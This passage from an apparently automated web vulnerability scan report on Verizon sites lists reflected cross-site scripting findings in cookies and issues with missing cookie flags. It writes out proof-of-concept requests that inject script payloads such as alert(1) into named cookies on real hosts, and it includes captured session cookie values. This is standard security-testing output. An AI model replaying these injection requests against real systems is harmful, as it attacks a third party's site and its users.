GET /content/verizonglobalhome/gpromo.aspx?a=1290217502286&state=TX HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; CP=null*; canigetfios=Y; showpromo=Y; BusinessUnit=residential; refURL=https://www22.verizon.com/; vzapps=STATE=TX8ae0f'-alert(1)-'8c7ffab235

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 13077
Expires: Sat, 20 Nov 2010 01:55:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:55:03 GMT
Connection: keep-alive

   
<div class="marquee_selector_bubble sprite sprite_marquee_bubble"></div>
                        <table class="marquee_selectors"><tr><td>
                       
                        <UL><LI><A class="marquee_selector
...[SNIP]...
<script>if(document.getElementById('yourlocation')) document.getElementById('yourlocation').innerHTML = 'TX8ae0f'-alert(1)-'8c7ffab235 ';</script>
...[SNIP]...

3.303. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [ECSPCookies cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /foryourhome/fttprepair/nr/common/MainMenu.aspx

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload 4d80b<script>alert(1)</script>dfd32d9c68b was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /foryourhome/fttprepair/nr/common/MainMenu.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=4d80b<script>alert(1)</script>dfd32d9c68b; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:42:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:42:02 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> 4d80b<script>alert(1)</script>dfd32d9c68b</span>
...[SNIP]...

3.304. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /foryourhome/fttprepair/nr/common/MainMenu.aspx

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload f407d<script>alert(1)</script>0ced4116a66 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /foryourhome/fttprepair/nr/common/MainMenu.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf407d<script>alert(1)</script>0ced4116a66; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:41:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:41:57 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TXf407d<script>alert(1)</script>0ced4116a66 </span>
...[SNIP]...

4. SSL cookie without secure flag set
There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


4.1. https://www36.verizon.com/fiostv/web/Signin.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /fiostv/web/Signin.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fiostv/web/Signin.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
RequestInfo: Served From :: BHDP1ISFTW05, Time Taken :: 406.2474
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172510
Date: Sat, 20 Nov 2010 03:04:08 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=enqz1b45ldlygb45bcucegq3; path=/; HttpOnly
Set-Cookie: DCReferringURL=/Signin.aspx; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Verizon | FiOS TV Central .
...[SNIP]...

4.2. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /fiostv/web/unprotected/showtime.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fiostv/web/unprotected/showtime.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
RequestInfo: Served From :: BHDP1ISFTW06, Time Taken :: 78.123
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24516
Date: Sat, 20 Nov 2010 03:04:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=wb5cyl55wlsb3445xgv2idj4; path=/; HttpOnly
Set-Cookie: DCReferringURL=/ShowTime.aspx; path=/


<html>
<body onload=ShowtimePlayer()>
<link rel="stylesheet" type="text/css" href="/fiostv/web/Resources/V_111510_1425/css/FTVStyles.css">

<script type="text/javascript">
var TargetURL = '
...[SNIP]...

4.3. https://www36.verizon.com/fiosvoice/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /fiosvoice/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fiosvoice/ HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 20582
Expires: Sat, 20 Nov 2010 03:04:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:04:12 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=anbrwlbkau52u2vo5euf5y45; path=/; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>SignIn</title><link rel="stylesheet" type="text/css" href="/FiOSVoice/Resources/V_102510_0938/css/Styles.css"></he
...[SNIP]...

5. Cookie without HttpOnly flag set
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://www2.verizon.net/help/dsl_settings/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www2.verizon.net
Path:   /help/dsl_settings/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/dsl_settings/ HTTP/1.1
Host: www2.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 139
Content-Type: text/html
Cache-Control: private
Date: Sat, 20 Nov 2010 03:06:55 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSQRTBTDT=IHPHDNIDIIFPACJGGLIHPLLP; path=/


           <script language="javascript">window.location = "http://my.verizon.com/micro/speedoptimizer/hsi/default.aspx"

</script>    
           


5.2. http://www2.verizon.net/micro/speedtest/hsi/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www2.verizon.net
Path:   /micro/speedtest/hsi/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /micro/speedtest/hsi/ HTTP/1.1
Host: www2.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://my.verizon.com/micro/speedtest/broadband/
Content-Length: 169
Content-Type: text/html
Cache-Control: private
Date: Sat, 20 Nov 2010 03:06:55 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSQRTBTDT=JHPHDNIDCEBHDNBGBMPHKFGD; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://my.verizon.com/micro/speedtest/broadband/">here</a>.</body>

5.3. http://www35.vzw.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www35.vzw.com
Path:   /HG

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HG?hc=&hb=DM570118F3VN%3BDM570203L6VD&cd=1&hv=6&n=home&con=&vcon=/microsites/ptt&tt=auto&ja=y&dt=19&zo=360&lm=1284069179000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&hid=0.9877317685168236 HTTP/1.1
Host: www35.vzw.com
Proxy-Connection: keep-alive
Referer: http://solutions.vzwshop.com/PTT/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 20 Nov 2010 03:03:49 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: CTG=1290222229; path=/; domain=www35.vzw.com; expires=Sat, 27-Nov-2010 03:03:49 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Cache-Control: max-age=0, private, proxy-revalidate
Expires: Sat, 20 Nov 2010 03:03:50 GMT
Location: http://www35.vzw.com/HGct?hc=&hb=DM570118F3VN%3BDM570203L6VD&cd=1&hv=6&n=home&con=&vcon=/microsites/ptt&tt=auto&ja=y&dt=19&zo=360&lm=1284069179000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&hid=0.9877317685168236
Content-Type: image/gif
Content-Length: 0


5.4. https://www36.verizon.com/fiostv/web/Signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiostv/web/Signin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fiostv/web/Signin.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
RequestInfo: Served From :: BHDP1ISFTW05, Time Taken :: 406.2474
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172510
Date: Sat, 20 Nov 2010 03:04:08 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=enqz1b45ldlygb45bcucegq3; path=/; HttpOnly
Set-Cookie: DCReferringURL=/Signin.aspx; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Verizon | FiOS TV Central .
...[SNIP]...

5.5. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiostv/web/unprotected/showtime.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fiostv/web/unprotected/showtime.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
RequestInfo: Served From :: BHDP1ISFTW06, Time Taken :: 78.123
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24516
Date: Sat, 20 Nov 2010 03:04:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=wb5cyl55wlsb3445xgv2idj4; path=/; HttpOnly
Set-Cookie: DCReferringURL=/ShowTime.aspx; path=/


<html>
<body onload=ShowtimePlayer()>
<link rel="stylesheet" type="text/css" href="/fiostv/web/Resources/V_111510_1425/css/FTVStyles.css">

<script type="text/javascript">
var TargetURL = '
...[SNIP]...

6. Password field with autocomplete enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiostv/web/Signin.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /fiostv/web/Signin.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
RequestInfo: Served From :: BHDP1ISFTW05, Time Taken :: 406.2474
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172510
Date: Sat, 20 Nov 2010 03:04:08 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=enqz1b45ldlygb45bcucegq3; path=/; HttpOnly
Set-Cookie: DCReferringURL=/Signin.aspx; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Verizon | FiOS TV Central .
...[SNIP]...
</script>

<form name="aspnetForm" method="post" action="Signin.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td>
<input id="Password" name="Password" style="width: 200px;" type="password" value=""
onkeydown="HandleEnterKey(event);" tabindex="2" />

</td>
...[SNIP]...

7. Cross-domain Referer leakage
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

